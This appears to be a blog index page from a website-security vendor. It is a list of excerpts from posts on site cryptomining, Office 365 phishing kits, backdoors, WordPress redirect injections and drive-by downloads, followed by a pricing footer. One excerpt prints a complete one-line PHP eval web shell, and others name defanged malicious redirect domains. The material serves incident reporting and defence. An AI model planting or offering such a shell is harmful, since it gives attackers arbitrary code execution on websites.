Background Only a few days ago, we released a write up about hackers using compromised websites for bitcoin mining. Just recently we responded to another hacking incident that uses the website visitor’s computer for bitcoin mining. Bitcoin mining is primarily a means of earning commission on bitcoin transactions. Here is a simplistic explanation of what bitcoin mining is and why hackers want to use your site’s visitors' computers. Each time a bitcoin is bought, traded or sold a record of the transaction must be created.
Read more →
In our recent post about anti-malware myths, we spoke of visitor dependent malware. Three of the methods used to identify which visitors to attack and which to hide from are geolocation awareness, IP address awareness, and language awareness. Malware and phishing content hidden on a business’s website may infect or ignore visitors from some locations but not others. This behavior can help malware to hide on a compromised website for weeks, months, or even years.
Protecting Your Online Success with Anti-Malware for Websites ThreatSign users represent almost every industry out there. They are doing a great job, each one in their domain of expertise, in creating products and services that change the lives of their clients making them better. Assistive software solutions that help people with dyslexia and dysgraphia in their struggle to read and write, a biotech company researching new medicines, resort boutiques, healthcare services, and the list goes on.
Public Computers, Malware, and I Never Thought I Would Find Malware There! Name seven places where you might find public computers. Let me see if I can guess what you came up with. Hotels, libraries, airports, coffee shops, job search assistance locations, schools, and conference facilities. Let me add one more; the microphone. Let's begin with the realization that some public computers are open to all or mostly all of the public, but even those that have restrictions on who can use them are still public computers.
Introduction Bitcoin is a digital currency that has been around since 2008 but was released in 2009. Recently, it has been gaining popularity because of the increasing number of merchants that are accepting bitcoins as a form of payment. Current Bitcoin exchange rate to USD is off the charts and is still climbing higher. How Hackers Use Your Website For BitCoin Mining? One of the ThreatSign customers has recently asked us to monitor their website as they were experiencing high CPU usage.
This is not just another phishing attack blog. This is about your business’ well-being should your website be compromised. This about hosting providers who may inadvertently allow multiple client’s websites to be compromised simultaneously, thereby putting their own business at risk. This is about protecting reputations and maintaining accessibility to your website or to the websites that you host. Janet Evans is an American swimmer who won four Olympic gold medals and one silver medal.
Ransomware Cyber-Attack Threat A continually improving ransomware attacks is a challenge that IT companies, online businesses, health trusts and even governments are facing. In a short-term, ransomware infection blocks access to essential files on computer or server for weeks and months. Such cyber security incident is dangerous for daily business operation knocking out successful businesses until the hacking recovery. While in long-term, ransomware infection has severe consequences striking business's reputation and leading to commercial and financial collapse.
Introduction During recent phishing incident handled by ThreatSign incident response team, a phishing link lead to a discovery of the Phishing Kit. The prompt actions allowed to mitigate the threat and avoid its distribution in the wild. Let's skip the attack background and head to the Phish Kit details: Office 365 PhishKit MD5: b46a0a1035e49e2e9e0218ebbd97fffe The file is a zipped file that contains the whole directory of the phishing kit. Upon loading the files on a web server it shows a familiar Office 365 login page: Upon entering fictional credentials, the fake Office login page made the following requests:
Introduction Typically, Backdoor malware is one of the initial stages of the cyber attack. Hackers find vulnerabilities on the site and upload arbitrary files (in this case a Backdoor) to your site and then access it via browser. This is how a plain old Backdoor looks like: For more information about a Backdoor: FilesMan Backdoor Malware On Your Computer Using Legitimate Code Wrappers To Avoid Detection By The Web Malware Scanners The above-mentioned type of backdoor has identifiable signatures which are distributed among the security vendors and then utilized in the traditional (signature-based) detection algorithms.
Introduction In the last few days we received lots of JavaScript infection related to page redirection. One of the most common techniques is an inserted JavaScript that targets WordPress CMS. The attacker inserts the link, hxxs://traffictrade[.]life/scripts.js on each page. This link then redirects the visitors to your site to the https://redirect[.]trafficreceiver.club/landing/ where they will see the malicious pop-ups. The interesting part is, there were no infected files on customer's site. The only sign is the code injected into the 'wp_options' table inside the database.
Introduction Malicious wrongdoings are not always updated. But the attack vectors are. Hackers are constantly evolving their way of attacks. But once the infiltration succeeds they will just use good old techniques as they are already on your server and no further sophisticated obfuscation is required. We have uncovered a new malware that uses websites to perform DDoS attacks. Malicious code was uploaded to the website and run the bot to perform whatever the hacker wants it to do.
Introduction Site after site is being hacked every second that we spent on the internet. Many of these are commercial sites that involve money or sensitive information crucial to the website owner. How are these sites being hacked anyway? First and essential step in the cyber attack planning, that we already stressed in previous posts, is the security information gathering on potential victim websites. Since the majority of the commercial sites are created using CMS (Content Management System), the information on the underlying code is publicly available.
PHP is a general server-side scripting language providing very reach arsenal for web development. As a part of it, PHP provides broad capabilities to develop generic shells that can run on almost every website. In the recent website malware cleanup process we detected generic shell that occupied only 18 characters. The following is the code of this shell capable of executing any arbitrary malicious content submitted by attackers. <?php @eval($_POST[yt]); This shell has three major parts @ - PHP Error control operator making PHP interpreter to ignore any occured error (http://php.
Introduction Each automated or manual cyber attack starts with gathering as much information about the targeted website or server as possible. Usually, the first step would be the “poc scanning”, which aims to locate and identify an execution environment setup. Website owners tend to neglect the protection of such information and probably not aware of the risk accompanied. In this post, you will learn a simple technique that you can use to improve your website security.
Introduction Among the Content Management Systems (CMS) the WordPress is probably the most popular. Our statistics in the Annual Website Malware Report | 2016 show WordPress as leading CMS in 2016. Due to its popularity, it is also prone to vulnerabilities. In the same report it can be seen that 76% of our infected customers were using WordPress. What Are The Main Components Of The WordPress Installation? Each WordPress website has three main parts:
Introduction We have encountered a 5-year-old malware while cleaning up one of our customer's website. The malware used a drive-by download method to infect the users. What is Drive-by Download? The drive-by download is an attack vector wherein the users are downloading the payload without their knowledge or consent. It usually happens during the visit to an infected site, reviewing an email or by just clicking a popup advertisement. What does the payload do?
Introduction This short post is about recent attack that targets the Joomla! Content Management System's and specifically its templates. We decided that it is worth to spread the word about it after our malware experts resolved numerous similar incidents. Attack On Joomla! Templates The file index.php contains a malicious script that calls its main component like the snippet below: But if you view the site source via the web, the added script just before the head tag looks like this: Note: For stat88b.
Introduction As for the definition in CMS (Content Management System), a plugin is a collection of code files that adds one or more features to your website. After you install the core code for your CMS, you can install your choice of plugins. Depending on the nature and the design of your site, you can choose from thousands of plugins available on the internet. Our incident response team encountered one peculiar issue where the website got blacklisted for distributing adware to its visitors.
Ads has been spreading all over the internet starting from any social networking sites to almost everything. Some ads are plain and straightforward, and some are horrific and disturbing. Like this one that we got just last week. When we checked a link, it showed these images below: And it will take you to the Play Store to download an app. If you are still unaware, along with the helpful and useful apps the Google Play Store is infested with a lot of malicious apps.
Background One of the most recognizable errors encountered on the Internet is the “404 Not Found” page. The website hosting server usually generates such error when a visitor attempts to access a page that does not exist (broken or dead link). Webmasters can configure the servers to display a customized and more user-friendly 404 error page offering the sitemap, branding or other helpful information. This post shows how the hackers that broke into the web server through the compromised website exploited this mechanism to serve SPAM.
Get your website cleaned and removed from blacklists. Prevent traffic loss and protect your visitors now.
$249
/ yr
$149
more plans
Need help? contactus@quttera.com
Join our mailing list to receive free email updates